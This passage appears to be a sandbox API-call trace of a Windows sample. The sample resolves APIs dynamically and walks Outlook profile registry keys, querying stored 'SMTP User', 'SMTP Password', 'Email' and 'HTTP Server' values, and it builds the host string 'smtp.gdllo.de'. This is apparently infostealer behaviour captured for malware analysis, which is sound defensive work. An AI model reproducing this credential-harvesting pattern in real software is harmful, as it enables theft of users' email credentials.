dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617160 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x6171e0 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617210 [0187.010] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.010] lstrlenA (lpString="smtp.gdllo.de") returned 13 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617130 [0187.010] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] GetProcessHeap () returned 0x560000 [0187.010] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.011] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.011] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171e0, Size=0xe) returned 0x617130 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171e0 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617180 [0187.011] GetProcAddress (hModule=0x7ffb26090000, lpProcName="CharLowerA") returned 0x7ffb260ba5f0 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617160 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617210 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617210, Size=0xf) returned 0x617180 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617180, Size=0x29) returned 0x613080 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617160 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617180, Size=0x13) returned 0x615c60 [0187.011] GetProcessHeap () returned 0x560000 [0187.011] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617180 [0187.012] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetLastError") returned 0x7ffb2624b730 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.012] SetLastError (dwErrCode=0x0) [0187.012] GetProcessHeap () returned 0x560000 [0187.012] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0187.012] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.012] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20019, phkResult=0x231f2b8 | out: phkResult=0x231f2b8*=0x230) returned 0x0 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615de0 [0187.012] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615de0 | out: hHeap=0x560000) returned 1 [0187.012] RegQueryValueExA (in: hKey=0x230, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x231f2b0, lpData=0x231f2d0, lpcbData=0x231f2e8*=0x4 | out: lpType=0x231f2b0*=0x0, lpData=0x231f2d0*=0x0, lpcbData=0x231f2e8*=0x4) returned 0x2 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617160 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0187.012] GetProcessHeap () returned 0x560000 [0187.012] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617180, Size=0x13) returned 0x615c60 [0187.012] GetProcessHeap () returned 0x560000 [0187.013] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617180 [0187.013] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0187.013] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x234) returned 0x0 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f40 [0187.013] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0187.013] RegQueryValueExA (in: hKey=0x234, lpValueName="SMTP User", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x0, lpData=0x0, lpcbData=0x231f2a4*=0x0) returned 0x2 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0187.013] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.013] RegCloseKey (hKey=0x234) returned 0x0 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617210 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x613080, Size=0x47) returned 0x620140 [0187.013] GetProcessHeap () returned 0x560000 [0187.013] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617160 [0187.014] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.014] lstrlenA (lpString="smtp://smtp.gdllo.de|smtp.gdllo.de") returned 34 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617160 [0187.014] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0187.014] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.014] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620140, Size=0x23) returned 0x613080 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x400) returned 0x653d40 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x617160 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617180, Size=0x1b) returned 0x615ee0 [0187.014] GetProcessHeap () returned 0x560000 [0187.014] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615f40 [0187.014] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0187.015] RegQueryValueExA (in: hKey=0x218, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x231f370, lpData=0x653d40, lpcbData=0x231f330*=0x400 | out: lpType=0x231f370*=0x0, lpData=0x653d40*=0x0, lpcbData=0x231f330*=0x400) returned 0x2 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ee0 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x653d40 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x613080 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610920 | out: hHeap=0x560000) returned 1 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x62) returned 0x610920 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617130 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617210 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617150 [0187.015] GetProcessHeap () returned 0x560000 [0187.015] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617150, Size=0x17) returned 0x615ce0 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617150 [0187.016] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.016] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f2b0 | out: phkResult=0x231f2b0*=0x234) returned 0x0 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615da0 [0187.016] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0187.016] RegQueryValueExA (in: hKey=0x234, lpValueName="HTTP Server", lpReserved=0x0, lpType=0x231f2a8, lpData=0x0, lpcbData=0x231f2a4*=0x0 | out: lpType=0x231f2a8*=0x0, lpData=0x0, lpcbData=0x231f2a4*=0x0) returned 0x2 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0187.016] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.016] RegCloseKey (hKey=0x234) returned 0x0 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x560000) returned 1 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.016] GetProcessHeap () returned 0x560000 [0187.016] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610920 | out: hHeap=0x560000) returned 1 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0187.017] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0187.017] RegCloseKey (hKey=0x218) returned 0x0 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.017] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.017] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x2, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x0 [0187.017] lstrlenA (lpString="00000003") returned 8 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617130 [0187.017] lstrcpyA (in: lpString1=0x617130, lpString2="00000003" | out: lpString1="00000003") returned="00000003" [0187.017] lstrlenA (lpString="\\") returned 1 [0187.017] GetProcessHeap () returned 0x560000 [0187.017] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171c0 [0187.017] lstrcpyA (in: lpString1=0x6171c0, lpString2="\\" | out: lpString1="\\") returned="\\" [0187.017] GetProcessHeap () returned 0x560000 [0187.018] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x59) returned 0x619470 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x619470, Size=0xb3) returned 0x61dc40 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5a) returned 0x6192f0 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6192f0, Size=0xc3) returned 0x610840 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61dc40 | out: hHeap=0x560000) returned 1 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.018] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0187.018] GetProcessHeap () returned 0x560000 [0187.018] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.018] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x231f588 | out: phkResult=0x231f588*=0x218) returned 0x0 [0187.018] GetProcessHeap () returned 0x560000 [0187.020] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617190 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617150 [0187.021] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExA") returned 0x7ffb28a67200 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.021] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x231f500 | out: phkResult=0x231f500*=0x234) returned 0x0 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x11) returned 0x615ea0 [0187.021] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryValueExA") returned 0x7ffb28a672d0 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0187.021] RegQueryValueExA (in: hKey=0x234, lpValueName="Email", lpReserved=0x0, lpType=0x231f4f8, lpData=0x0, lpcbData=0x231f4f4*=0x0 | out: lpType=0x231f4f8*=0x0, lpData=0x0, lpcbData=0x231f4f4*=0x0) returned 0x2 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617250 [0187.021] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0187.021] RegCloseKey (hKey=0x234) returned 0x0 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.021] GetProcessHeap () returned 0x560000 [0187.021] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.022] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.022] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x3, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x103 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0187.022] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0187.022] RegCloseKey (hKey=0x1d0) returned 0x0 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61db80 | out: hHeap=0x560000) returned 1 [0187.022] lstrlenA (lpString="\\") returned 1 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617130 [0187.022] lstrcpyA (in: lpString1=0x617130, lpString2="\\" | out: lpString1="\\") returned="\\" [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616b90 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0x71) returned 0x610840 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616b90 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616b90, Size=0xb1) returned 0x61de80 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0187.022] GetProcessHeap () returned 0x560000 [0187.022] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.023] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.023] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x231f578 | out: phkResult=0x231f578*=0x1d0) returned 0x0 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0187.023] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyA") returned 0x7ffb28a6d0d0 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0187.023] RegEnumKeyA (in: hKey=0x1d0, dwIndex=0x0, lpName=0x231f6e0, cchName=0x400 | out: lpName="00000003") returned 0x103 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0187.023] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0187.023] GetProcessHeap () returned 0x560000 [0187.023] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0187.023] RegCloseKey (hKey=0x1d0) returned 0x0 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x61de80 | out: hHeap=0x560000) returned 1 [0187.024] lstrlenA (lpString="\\") returned 1 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0187.024] lstrcpyA (in: lpString1=0x617250, lpString2="\\" | out: lpString1="\\") returned="\\" [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616c90 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0x71) returned 0x610840 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616c90 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616c90, Size=0xb1) returned 0x61db80 [0187.024] GetProcessHeap () returned 0x560000 [0187.024] HeapFree (in: 